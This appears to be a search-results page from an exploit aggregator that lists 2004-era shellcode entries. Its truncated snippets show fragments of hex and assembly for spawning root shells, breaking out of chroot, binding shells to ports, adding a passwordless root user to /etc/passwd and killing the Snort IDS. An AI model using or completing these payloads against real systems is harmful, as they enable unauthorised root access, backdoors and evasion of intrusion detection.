Lucene search
+L

3623 matches found

0day.today
0day.today
added 2004/09/26 12:0 a.m.18 views

linux/x86 kill snort 151 bytes

Exploit for linux/x86 platform in category shellcode ============================== linux/x86 kill snort 151 bytes ============================== / x86 linux "snort IDS" shutter shellcode size 151 By nob0dy // find your own reality / / char snortshuttershellcode =...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/26 12:0 a.m.25 views

freebsd/x86 - kldload /tmp/o.o 74 bytes

freebsd/x86 kldload /tmp/o.o 74 bytes. Shellcode exploit for freebsdx86 platform / The kldload shellcode setuid0 loads /tmp/o.o kernel module Size 74 bytes OS FreeBSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi xor eax,eax mov al,0x17 push eax in...

0.2AI score
SaveExploits0
0day.today
0day.today
added 2004/09/26 12:0 a.m.28 views

bsd/x86 execve /bin/sh setuid (0) 29 bytes

Exploit for bsd/x86 platform in category shellcode ========================================== bsd/x86 execve /bin/sh setuid 0 29 bytes ========================================== / BSD version FreeBSD, OpenBSD, NetBSD. email protected 29 bytes. -setuid0; -execve/bin/sh; / char shellcode= "\x31\xc0...

7AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.16 views

linux/x86 break chroot execve /bin/sh 80 bytes

No description provided by source. / This is Linux chroot/execve code.It is 80 bytes long.I have some ideas how to make it smaller, but till then use this one. signed predator linux registered user : 181116 preedatoratsendmaildotru / char...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.32 views

linux/SPARC - portbind port 8975 284 bytes

linux/SPARC portbind port 8975 284 bytes. Shellcode exploit for linuxsparc platform / 0-day portbind shellcode for all those Sun machines running linux.. Coded from scratch, so i take all the credits. It simply binds a pretty shell in port 8975/tcp enjoy. no nulls, no fork, no shit, couldn't be...

SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.31 views

linux/x86 bsd/x86 execve /bin/sh 38 bytes

linux/x86 bsd/x86 execve /bin/sh 38 bytes. Shellcode exploits for multiple platform / Linux/x86 and Bsd/x86 execve of /bin/sh by dymitri!!! / include char code = "\x31\xc0" "\x50" "\x68\x2f\x2f\x73\x68" "\x68\x2f\x62\x69\x6e" "\x89\xe3" "\x50" "\x54" "\x53" "\x50" "\x8c\xe0" "\x21\xc0" "\x74\x04"...

SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.20 views

linux/x86 add user t00r 82 bytes

linux/x86 add user t00r 82 bytes. Shellcode exploit for linx86 platform / [email protected] 0x14abril0x7d2 82 bytes Agrega la linea "t00r::0:0::/:/bin/sh" en /etc/passwd Encriptada en http://www.shellcode.com.ar/linux/lnx-t00r-cr1.c / include // Shellcode // Asm Code char shellcode=...

7.4AI score
SaveExploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.33 views

linux/x86 break chroot 46 bytes

Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 46 bytes =============================== / The setuid0+chroot shellcode it will put '../' 10 times Size 46 bytes OS BSD /rootteam/dev0id www.sysworld.net email protected BITS 32 jmp short...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.31 views

linux/x86 execve /bin/sh tolower evasion 41 bytes

linux/x86 execve /bin/sh tolower evasion 41 bytes. Shellcode exploit for linx86 platform / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include char c0de = / main: / "\xeb\x1b" / jmp callz / / start: / "\x5e" / popl %esi / "\x89\xf3" / movl %esi, %ebx / "\x89\xf7" /...

SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.25 views

linux/x86 break chroot 34 bytes

linux/x86 break chroot 34 bytes. Shellcode exploit for linx86 platform / The setuid0+chroot shellcode. It is the one of the smallest shellcodes in the !!world!! it will put '../' 10 times Size 34 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 xor ecx,ecx xor eax,eax...

7.4AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.21 views

linux/x86 break chroot 34 bytes

No description provided by source. / The setuid0+chroot shellcode. It is the one of the smallest shellcodes in the !!world!! it will put '../' 10 times Size 34 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 xor ecx,ecx xor eax,eax push eax mov al,0x17 push eax int 0x...

7.1AI score
SaveExploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.15 views

linux/x86 break chroot 34 bytes

Exploit for linux/x86 platform in category shellcode =============================== linux/x86 break chroot 34 bytes =============================== / The setuid0+chroot shellcode. It is the one of the smallest shellcodes in the !!world!! it will put '../' 10 times Size 34 bytes OS BSD...

7AI score
SaveExploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.22 views

linux/x86 execve /bin/sh 30 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 30 bytes ================================= / email protected 20 de marzo de 2001 "\x31\xdb" // xorl %ebx,%ebx "\x8d\x43\x17" // leal 0x17%ebx,%eax "\xcd\x80" // int $0x80 "\x31\xd2" //...

7AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.30 views

linux/x86 break chroot 46 bytes

linux/x86 break chroot 46 bytes. Shellcode exploit for linx86 platform / The setuid0+chroot shellcode it will put '../' 10 times Size 46 bytes OS BSD /rootteam/dev0id www.sysworld.net [email protected] BITS 32 jmp short callme main: pop esi mov edi,esi xor ecx,ecx push ecx mov al,0x17 push ea...

SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.11 views

linux/x86 execve /bin/sh tolower() evasion 41 bytes

No description provided by source. / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include stdio.h char c0de = / main: / "\xeb\x1b" / jmp callz / / start: / "\x5e" / popl %esi / "\x89\xf3" / movl %esi, %ebx / "\x89\xf7" / movl %esi, %edi / "\x83\xc7\x07" / addl $0x07,...

7.1AI score
SaveExploits0
seebug.org
seebug.org
added 2004/09/12 12:0 a.m.22 views

linux/SPARC portbind port 8975 284 bytes

No description provided by source. / 0-day portbind shellcode for all those Sun machines running linux.. Coded from scratch, so i take all the credits. It simply binds a pretty shell in port 8975/tcp enjoy. no nulls, no fork, no shit, couldn't be more optimized. enjoy!. Arch : Sparc OS : Linux Ta...

7.1AI score
SaveExploits0
Exploit DB
Exploit DB
added 2004/09/12 12:0 a.m.33 views

linux/x86 portbind port 5074 + fork 130 bytes

linux/x86 portbind port 5074 + fork 130 bytes. Shellcode exploit for linx86 platform / [email protected] 0x9abril0x7d2 syssocketcall 102 0x66 %eax, esta es nuestra rutina principal. En todas las subrutinas vamos a necesitar a: %eax = 0x66. Luego del archivo include/linux/net.h obtenemos l...

SaveExploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.23 views

linux/x86 execve /bin/sh 24 bytes

Exploit for linux/x86 platform in category shellcode ================================= linux/x86 execve /bin/sh 24 bytes ================================= / email protected execve/bin/sh. 24 bytes. es lo mas chica que se puede hacer. / char shellcode= "\x31\xc0" // xorl %eax,%eax "\x50" // pushl...

7AI score
SaveExploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.20 views

linux/SPARC portbind port 8975 284 bytes

Exploit for linux/sparc platform in category shellcode ======================================== linux/SPARC portbind port 8975 284 bytes ======================================== / 0-day portbind shellcode for all those Sun machines running linux.. Coded from scratch, so i take all the credits. It...

7AI score
SaveExploits0
0day.today
0day.today
added 2004/09/12 12:0 a.m.22 views

linux/x86 execve /bin/sh tolower() evasion 41 bytes

Exploit for linux/x86 platform in category shellcode =================================================== linux/x86 execve /bin/sh tolower evasion 41 bytes =================================================== / Linux/x86 tolower evasion, execve /bin/sh eg use: various qpop exploits / include char...

7AI score
SaveExploits0
Rows per page
Query Builder